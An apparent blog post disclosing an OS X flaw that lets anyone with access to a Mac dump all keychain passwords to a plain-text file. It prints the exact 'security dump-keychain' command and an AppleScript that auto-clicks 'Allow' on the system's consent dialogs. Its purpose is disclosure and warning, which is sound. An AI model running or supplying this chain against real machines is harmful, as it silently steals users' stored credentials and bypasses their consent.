Security Flaw in OS X displays all keychain passwords in plain text

This afternoon, a friend learned the hard way that you don’t let an unofficial company take control of your computer to provide “support”. However, it was what I learned that shocked me the most.

There is a method in OS X that will allow any user to export your keychain, without sudo privileges or any system dialogs, to a text file, with the username and passwords displayed in plain text. As of this writing, this method works in at least 10.10 and 10.11.5, and presumably at the least all iterations in between.

The method consists of opening up terminal, and cutting and pasting the following code:

security dump-keychain -d login.keychain > keychain.txt

You can circumvent all system dialogs by scripting that terminal command and adding the following:

tell application "System Events"
    repeat while exists (processes where name is "SecurityAgent")
        tell process "SecurityAgent"
            click button "Allow" of group 1 of window 1
        end tell
        delay 0.2
    end repeat
end tell

Any unauthorized user, wether its through a remote session like with my friend, or someone you’ve let borrow your computer for only a few seconds, can gain access to every username and password you’ve ever stored in Keychain, and inherently, iCloud.

Apple prides itself on security, but apparently this has been a known method for at least the two years…